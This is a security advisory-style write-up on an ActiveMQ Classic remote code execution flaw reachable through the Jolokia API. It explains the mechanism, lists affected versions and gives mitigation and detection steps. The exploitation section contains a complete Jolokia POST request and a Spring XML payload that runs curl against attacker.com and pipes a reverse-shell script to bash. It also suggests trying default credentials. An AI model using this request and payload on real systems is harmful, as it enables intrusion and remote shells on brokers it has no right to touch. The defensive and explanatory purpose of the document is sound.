CVE-2026-34197 identifies a critical remote code execution (RCE) vulnerability within Apache ActiveMQ Classic, specifically exploitable via its Jolokia API. This flaw, which remained undetected for approximately 13 years, allows an attacker to manipulate ActiveMQ's management operations through the Jolokia HTTP-to-JMX bridge, leading to the execution of arbitrary operating system commands by forcing the broker to retrieve and process a remote configuration file. While successful exploitation often requires authentication, common default credentials (e.g., admin:admin) are frequently present in many deployments. Furthermore, in ActiveMQ versions 6.0.0 through 6.1.1, a separate vulnerability, CVE-2024-32114, inadvertently exposes the Jolokia API without authentication, rendering CVE-2026-34197 an unauthenticated RCE in those specific configurations.
Jolokia and ActiveMQ Management Interface
Apache ActiveMQ Classic incorporates a web-based management console, typically accessible on port 8161, which is powered by the Jetty web server. This console integrates Jolokia, an open-source HTTP-to-JMX bridge that translates JMX (Java Management Extensions) operations into a REST-like HTTP interface. JMX is a Java technology designed for managing and monitoring applications, devices, and service-driven networks, exposing management beans (MBeans) for runtime control and diagnostics.
The core issue of CVE-2026-34197 stems from the default Jolokia access policy, which permits "exec" operations on all ActiveMQ MBeans under the org.apache.activemq:* domain. This broad permission, intended to ensure the web console's functionality, bypasses restrictions that were put in place to mitigate a previous vulnerability, CVE-2022-41678. CVE-2022-41678 involved authenticated attackers exploiting exposed JDK MBeans, such as those related to Java Flight Recorder (JFR) or Log4j2, to write webshells to disk. The fix for CVE-2022-41678 restricted Jolokia to read-only operations by default and denied access to dangerous MBeans, but critically, it introduced a blanket allowance for all operations on ActiveMQ's own MBeans, which CVE-2026-34197 now exploits.
Vulnerability Mechanism and Exploitation Chain
The exploit chain for CVE-2026-34197 leverages a legitimate runtime feature within ActiveMQ responsible for setting up broker-to-broker bridges. This operation can be invoked through the permissive Jolokia API. The vulnerability specifically targets ActiveMQ's VM transport feature, designed for embedding a broker within an application, where the client and broker communicate directly within the same JVM.
An attacker can exploit this by crafting a request that invokes the addNetworkConnector MBean operation via Jolokia. This operation accepts a VM transport URI. If this URI references a non-existent broker, ActiveMQ creates one and critically accepts a parameter (brokerConfig) instructing it to load a configuration. This brokerConfig parameter can be supplied with an attacker-controlled URL, typically pointing to a remote Spring XML configuration file.
When ActiveMQ attempts to load and instantiate the bean definitions from this remote Spring XML file, it can lead to arbitrary code execution. The Spring XML configuration can include bean definitions that execute OS commands during their initialization.
The general exploitation flow is as follows:
- An attacker identifies a vulnerable ActiveMQ Classic instance with an accessible Jolokia endpoint. Tools like Zondex can be instrumental in discovering such exposed services across the internet.
- If authentication is required, the attacker attempts to use default credentials (e.g., admin:admin) or exploits CVE-2024-32114 on relevant versions to bypass authentication.
- The attacker hosts a malicious Spring XML configuration file on a controlled server.
- A crafted HTTP POST request is sent to the Jolokia API (e.g.,
/api/jolokia/exec/org.apache.activemq:brokerName=*,Type=Broker/addNetworkConnector). - The request body contains the malicious VM transport URI, including the
brokerConfigparameter pointing to the attacker-controlled XML. - ActiveMQ processes the request, fetches the remote XML, and executes the embedded commands.
Example of a conceptual Jolokia request for exploitation (simplified):
POST /api/jolokia/exec/org.apache.activemq:brokerName=*,Type=Broker/addNetworkConnector HTTP/1.1
Host: target-activemq:8161
User-Agent: curl/7.81.0
Accept: */*
Content-Type: application/json
Content-Length: [Calculated_Length]
{
"type": "exec",
"mbean": "org.apache.activemq:brokerName=localhost,type=Broker",
"operation": "addNetworkConnector",
"arguments": [
"vm://localhost?brokerConfig=xbean:http://attacker.com/malicious.xml&create=true"
]
}
In this example, attacker.com/malicious.xml would contain the Spring XML configuration designed to execute commands. For instance, a simple XML could instantiate a bean that runs a shell command:
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="
http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="exploit" class="java.lang.ProcessBuilder">
<constructor-arg>
<list>
<value>/bin/bash</value>
<value>-c</value>
<value>curl http://attacker.com/reverse_shell.sh | bash</value>
</list>
</constructor-arg>
<property name="start"><bean class="java.lang.ProcessBuilder" factory-method="start"></bean></property>
</bean>
</beans>
This hypothetical XML would attempt to download and execute a reverse shell script from the attacker's server. Using a service like GProxy can assist researchers in anonymously testing such remote interactions and routing traffic for analysis without exposing their direct origin.
Affected Versions
This vulnerability impacts Apache ActiveMQ Classic. Specific versions are vulnerable based on the presence of the core flaw and the associated authentication bypass (CVE-2024-32114).
| Product | Vulnerable Versions | Patched Versions |
|---|---|---|
| Apache ActiveMQ Classic | 5.x before 5.19.4 | 5.19.4 and later |
| Apache ActiveMQ Classic | 6.0.0 through 6.2.2 | 6.2.3 and later |
Detection and Mitigation
Organizations should treat CVE-2026-34197 as a high-priority vulnerability due to ActiveMQ's history as a target for real-world attacks and the widespread deployment of ActiveMQ Classic.
Mitigation:
- Update Immediately: Upgrade Apache ActiveMQ Classic to versions 5.19.4 or 6.2.3, or later, as these versions contain the patch for CVE-2026-34197.
- Remove Default Credentials: Ensure that default credentials (e.g., admin:admin) for the ActiveMQ web console and Jolokia API are changed to strong, unique passwords.
- Restrict Network Access: Limit direct exposure of ActiveMQ's web console (port 8161) to the public internet. Restrict access to the
/api/jolokiaendpoint to only trusted internal IP addresses and necessary management hosts. - Disable Jolokia: If the Jolokia API and web console are not actively used for management, disable them entirely to reduce the attack surface.
- Principle of Least Privilege: Implement strict access controls for any JMX-related interfaces.
Detection:
- Monitor ActiveMQ Broker Logs: Look for network connector activity referencing
vm://URIs withbrokerConfig=xbean:http. This pattern is a strong indicator of attempted exploitation. - HTTP Request Monitoring: Monitor for HTTP POST requests to the
/api/jolokia/path that containaddNetworkConnectorin the request body. - Outbound HTTP Requests: Watch for unusual or unexpected outbound HTTP requests originating from the ActiveMQ broker process to unknown or external hosts. Such requests could indicate the broker attempting to fetch a malicious remote configuration file.
- Child Process Monitoring: Observe for unexpected child processes spawned by the ActiveMQ Java process. This could signify successful command execution.
- Vulnerability Scanning: Regularly perform vulnerability scans against ActiveMQ deployments using tools like Secably to identify outdated versions or misconfigurations that expose the Jolokia API.